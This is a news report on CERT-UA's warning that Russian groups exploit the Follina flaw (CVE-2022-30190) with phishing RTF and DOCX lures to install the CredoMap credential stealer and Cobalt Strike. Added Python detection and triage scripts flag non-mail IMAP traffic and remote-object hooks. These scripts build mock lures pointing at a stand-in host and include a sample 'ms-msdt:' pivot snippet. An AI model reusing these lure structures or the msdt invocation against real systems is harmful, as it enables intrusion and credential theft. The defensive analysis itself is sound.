The Ukrainian CERT (CERT-UA) is warning that Russian hacking groups are exploiting the Follina code execution vulnerability (CVE-2022-30190) in new phishing campaigns to install the CredoMap malware and Cobalt Strike beacons. One of these groups, tracked as APT28, is targeting users with malware that steals credentials stored in browsers.
The APT28 hacking group is suspected of sending emails with the attachment “Nuclear Terrorism A Very Real Threat.rtf.” The threat actors chose this subject to lure recipients into opening the file, capitalizing on the widespread fear of a nuclear strike among Ukrainians.
CERT-UA has also identified a separate campaign by a threat actor tracked as UAC-0098, which likewise uses CVE-2022-30190 to infect targets with minimal user interaction.
The RTF document used in the APT28 campaign attempts to exploit CVE-2022-30190 to download and launch the CredoMap malware on the target’s device.
About CredoMap
CredoMap is a little-documented malware strain; many AV engines on VirusTotal flag it, and several vendors classify it as a password-stealing Trojan.
The malware seeks to steal account passwords and cookies from the Chrome, Edge, and Firefox web browsers. It then exfiltrates the stolen data over the IMAP email protocol to a C2 address hosted on an abandoned Dubai-based website.
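The exfiltration channel is the detectable part of this behaviour: a browser-credential stealer has no business speaking IMAP. The following is an added detection sketch, not code from CERT-UA's advisory or from the malware, that groups Sysmon-style network connection records (Event ID 3 fields) by process and flags IMAP sessions (ports 143/993) opened by anything other than an allowlisted mail client. The events, the process names and the allowlist are constructed assumptions, not indicators from the advisory.

```python
"""Added detection sketch (not CERT-UA's or the malware's code): flag IMAP
sessions opened by processes that are not mail clients, the pattern a
browser-credential stealer exfiltrating over IMAP would produce on an endpoint.
SAMPLE_EVENTS are constructed Sysmon-style Event ID 3 records, not real telemetry."""
import json
import os
from collections import defaultdict

IMAP_PORTS = {143, 993}
# Assumed allowlist of mail clients; tune to what is actually deployed
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}

SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    # Legitimate mail client on IMAPS: allowlisted, must not alert
    {"EventID": 3, "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "DestinationIp": "40.99.10.1", "DestinationPort": 993, "Protocol": "tcp", "ProcessId": 4120},
    # Unknown binary in Temp talking IMAP twice to the same host: should alert once, count 2
    {"EventID": 3, "Image": r"C:\Users\user\AppData\Local\Temp\update.exe",
     "DestinationIp": "203.0.113.7", "DestinationPort": 143, "Protocol": "tcp", "ProcessId": 5588},
    {"EventID": 3, "Image": r"C:\Users\user\AppData\Local\Temp\update.exe",
     "DestinationIp": "203.0.113.7", "DestinationPort": 143, "Protocol": "tcp", "ProcessId": 5588},
    # HTTPS from a system process: wrong port, ignored
    {"EventID": 3, "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "23.0.0.5", "DestinationPort": 443, "Protocol": "tcp", "ProcessId": 900},
    # Process-creation event for the same binary: wrong EventID, ignored
    {"EventID": 1, "Image": r"C:\Users\user\AppData\Local\Temp\update.exe", "ProcessId": 5588},
])


def imap_from_non_mail_process(jsonl_text):
    """Group Sysmon EID 3 records by (pid, image); return the processes that speak
    IMAP and are not an allowlisted mail client, with destinations and count."""
    by_proc = defaultdict(lambda: {"destinations": set(), "count": 0})
    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 3 or ev.get("Protocol") != "tcp":
            continue
        port = int(ev.get("DestinationPort", 0))
        if port not in IMAP_PORTS:
            continue
        image = ev["Image"]
        # Windows paths: normalise separators before taking the basename on any host
        if os.path.basename(image.replace("\\", "/")).lower() in MAIL_CLIENTS:
            continue
        entry = by_proc[(ev["ProcessId"], image)]
        entry["destinations"].add((ev["DestinationIp"], port))
        entry["count"] += 1
    return [
        {"pid": pid, "image": img, "destinations": sorted(v["destinations"]), "count": v["count"]}
        for (pid, img), v in by_proc.items()
    ]


if __name__ == "__main__":
    for alert in imap_from_non_mail_process(SAMPLE_EVENTS):
        print(alert)
```

Keying on process identity rather than on the destination is deliberate: the C2 here sits on a repurposed ordinary website, so a "known mail provider" allowlist of destinations would not help, whereas a non-mail binary opening port 143 or 993 stands out regardless of where it connects. The obvious gap is a stealer that injects into an allowlisted mail client; pairing this rule with process-injection telemetry closes it.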
CERT-UA had previously warned about Russian hackers from the Sandworm group exploiting CVE-2022-30190; this time, however, the attacks have been attributed to the APT28 gang.
In the UAC-0098 campaign, CERT-UA says the threat actor uses a DOCX file named “Imposition of penalties.docx”, and the payload fetched from a remote resource is a Cobalt Strike beacon with a recent compilation date.
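Both lures (the APT28 RTF and the UAC-0098 DOCX) share the same first step: the document carries a reference to a remote object that Word fetches on open, and the fetched content then invokes the ms-msdt: protocol handler, which is what CVE-2022-30190 abuses. The following triage helper is an added example, not code from CERT-UA or from either campaign: it pulls external oleObject/attachedTemplate targets out of an OOXML package, hex-decodes `\objdata` blobs in an RTF file to recover embedded URLs, and flags a fetched second stage that contains an ms-msdt: URI. The sample documents, the host `lure.example` and the HTML snippet are constructed for the demonstration and are not indicators from the advisory.

```python
"""Added triage helper (not CERT-UA's or the campaigns' code): find the remote-object
hook that the Follina (CVE-2022-30190) delivery chain relies on in RTF and DOCX
lures, and flag a fetched second stage that invokes the ms-msdt: handler.
The sample documents built below are constructed, not real lures."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
TEMPLATE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
REMOTE_REL_TYPES = {OLE_REL, TEMPLATE_REL}
# RFC 3986 characters only, so a trailing NUL or quote never sticks to the URL
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")
MSDT_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)


def external_object_targets(docx_bytes):
    """External oleObject/attachedTemplate targets in an OOXML package.
    Hyperlink relationships are external too but benign, so they are ignored."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") == "External" and rel.get("Type") in REMOTE_REL_TYPES:
                    hits.append(rel.get("Target"))
    return hits


def rtf_object_urls(rtf_bytes):
    """URLs inside the hex-encoded \\objdata blobs of an RTF file (ASCII or UTF-16LE)."""
    urls = set()
    for m in re.finditer(rb"\\objdata\s*([0-9a-fA-F\s]+)", rtf_bytes):
        hexdata = re.sub(rb"\s", b"", m.group(1))
        try:
            blob = bytes.fromhex(hexdata.decode("ascii"))
        except ValueError:  # odd-length or truncated hex: skip it rather than crash
            continue
        # Second view strips NULs so a UTF-16LE URL (as a URL moniker stores it) matches
        for view in (blob, blob.replace(b"\x00", b"")):
            urls.update(u.decode("latin-1") for u in URL_RE.findall(view))
    return sorted(urls)


def triage_document(doc_bytes):
    """Classify a document and list the remote objects it would fetch on open."""
    if doc_bytes[:2] == b"PK":
        fmt, targets = "ooxml", external_object_targets(doc_bytes)
    elif doc_bytes.lstrip().startswith(b"{\\rtf"):
        fmt, targets = "rtf", rtf_object_urls(doc_bytes)
    else:
        fmt, targets = "unknown", []
    return {"format": fmt, "remote_objects": targets, "suspicious": bool(targets)}


def second_stage_invokes_msdt(html_bytes):
    """True if fetched content tries to launch the ms-msdt: handler (Follina's pivot)."""
    return MSDT_RE.search(html_bytes) is not None


# --- constructed samples; lure.example is a hypothetical host, not an IOC ---
LURE_URL = "http://lure.example/stage.html"


def build_sample_docx(target=LURE_URL):
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OLE_REL}" Target="{target}" TargetMode="External"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"'
        ' Target="https://example.com/" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def build_sample_rtf(target=LURE_URL):
    # Minimal OLE1-style blob carrying the URL as UTF-16LE, the way a URL moniker does
    blob = b"\x01\x05\x00\x00" + target.encode("utf-16-le") + b"\x00\x00"
    return b"{\\rtf1{\\object\\objautlink{\\*\\objdata " + blob.hex().encode() + b"}}}"


if __name__ == "__main__":
    print(triage_document(build_sample_docx()))
    print(triage_document(build_sample_rtf()))
    print(second_stage_invokes_msdt(b'<script>location.href="ms-msdt:/id PCWDiagnostic"</script>'))
```

Two caveats when using this in practice. The RTF variant can fire from the Explorer preview pane without the file being opened, so a sandbox that only double-clicks the attachment may miss it; run the triage on the raw file instead. And on the endpoint side, the fix is the June 2022 Microsoft update for CVE-2022-30190; on unpatched hosts, Microsoft's published workaround of removing the `HKEY_CLASSES_ROOT\ms-msdt` protocol handler (after exporting it) breaks the chain at the pivot this script looks for.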